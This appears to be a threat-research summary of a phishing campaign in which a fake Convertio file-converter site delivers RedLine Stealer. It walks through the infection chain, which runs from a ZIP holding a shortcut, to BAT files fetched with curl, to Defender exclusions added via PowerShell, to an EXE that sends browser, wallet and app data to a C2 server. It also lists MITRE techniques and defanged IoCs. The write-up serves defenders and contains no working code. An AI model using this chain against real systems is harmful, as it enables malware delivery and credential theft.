Threat Research

Cyble – Online File Converter Phishing Page Spreads RedLine Stealer

Securonix

CRIL identified a phishing site impersonating Convertio that delivers the RedLine Stealer payload. The campaign uses a ZIP containing a shortcut to download BAT files, bypass Defender, and install an EXE that exfiltrates data to a C2 server. #RedLineStealer #Convertigoto

Keypoints

  • The phishing site at hxxps://convertigoto.net/ impersonates Convertio to lure users into using an online file converter.
  • The delivery chain relies on a ZIP containing a shortcut file (YourConvertedFile.lnk) that, when run, downloads BAT files (2.bat and 3.bat) from the attacker’s server.
  • 3.bat executes PowerShell commands to add Defender exclusions (exe, bat extensions and C: path) to evade antivirus protection.
  • 3.bat downloads the final payload YourConvertedFile59417.exe (renamed to 1.exe) and launches it, enabling execution of the RedLine Stealer.
  • RedLine Stealer’s capabilities include stealing browser data, wallet info, and data from various apps, collecting system information, and exfiltrating to its C2 server.
  • Adversaries use a MaaS model for RedLine Stealer and leverage legitimate online tools to maximize reach.
  • IoCs include the phishing domain, distribution URLs, the ZIP/LNK/BAT/EXE file names, and related file hashes.

MITRE Techniques

  • [T1566] Phishing – The attacker creates a fake file converter phishing site impersonating Convertio. Quote: “…phishing site, hxxps://convertigoto.net/, that impersonated a genuine ‘Convertio’ website.”
  • [T1204] User Execution – Infections begin when users click the “download” button on the phishing site. Quote: “the actual infection starts when the user clicks on the ‘download’ button present in the phishing site.”
  • [T1064] Scripting – The downloader uses command-line tools to fetch payloads (via curl) from attacker URLs. Quote: “using ‘curl executable’ and executed after renaming it to ‘1.exe’.”
  • [T1059] Command and Scripting Interpreter – 3.bat runs PowerShell commands to modify security settings (Add-MpPreference) to evade detection. Quote: “PowerShell commands to add the file extensions (‘exe’ & ‘bat’) and drive path (‘C:’) to the exclusion list of Windows Defender.”
  • [T1105] Ingress Tool Transfer – The BAT/EXE payloads are downloaded from attacker URLs using curl. Quote: “downloads an executable payload … from the below URL using ‘curl’ executable…”
  • [T1071] Application Layer Protocol – The RedLine Stealer communicates with its C2 using a SOAP API. Quote: “uses a SOAP API to communicate with its C&C server.”
  • [T1003] OS Credential Dumping / Credential Access – RedLine Stealer is capable of stealing information from browsers, wallets, and applications. Quote: “stealer is capable of stealing information from web browsers, cryptocurrency wallets, and applications such as FileZilla, Discord, Steam, Telegram, and VPN clients.”
  • [T1057] Process Discovery – The campaign references a process tree showing how the shortcut-based downloads execute. Quote: “process tree of shortcut file downloads.”
  • [T1082] System Information Discovery – RedLine collects OS, hardware, processes, antivirus, and installed programs. Quote: “collects information about the infected machine, such as OS, system hardware, running processes, antivirus products, installed programs, and system language.”

Indicators of Compromise

  • [URL] Phishing site – hxxps://convertigoto.net/ – Phishing site
  • [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/3.bat – Malware distribution URL
  • [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/2.bat – Malware distribution URL
  • [URL] Malware distribution – hxxps://convertigoto.net/cc/flesd/YourConvertedFile59417.exe – Malware distribution URL
  • [File] LNK file – YourConvertedFile.lnk – contained in the ZIP archive
  • [File] BAT file – 3.bat – downloaded by the shortcut
  • [File] EXE file – YourConvertedFile59417.exe – payload downloaded and executed
  • [File] ZIP archive – YourConvertedFile634643.zip – contains the LNK and BATs
  • [Hash] Zip file – MD5: 0350d40da8135fe9c8c61a939602dedd, SHA1: 6e30860d6b5c6348d7143f74b2ad734eee716da3, SHA256: 1089a26c46bb0e5a247593e5defd80503dc0d4950ee522f1de54fca99b1c21f6
  • [Hash] LNK file – MD5: 8be13313460c5f1befb20a1051f9f850, SHA1: 9e1dafcd668cb89d82ae85806d5b67f54509cb55, SHA256: f74b170a7f8258bc8824f0f5efad26e8081f793cc1c4d5282a5fcc43c3d71368
  • [Hash] BAT file “3.bat” – MD5: 209b97fe681f86b71162153b4ddbce32, SHA1: 18ddf2b3f414a970cc3915dc69b8d06eff55d4da, SHA256: 70f56299a49fdb0994adfff42b3d4b74f7036193d8a783ee8223180bf0b30bed
  • [Hash] Exe file – MD5: 303c63a7c8d3b15c72e079e720fc4ae4, SHA1: 9dac60afed2565c94ed3e1716032a9d989f82307, SHA256: eb7d31a5a641b057aa250442dc5252d4214ca282632ebd24a79644fe358fbe18

Read more: https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/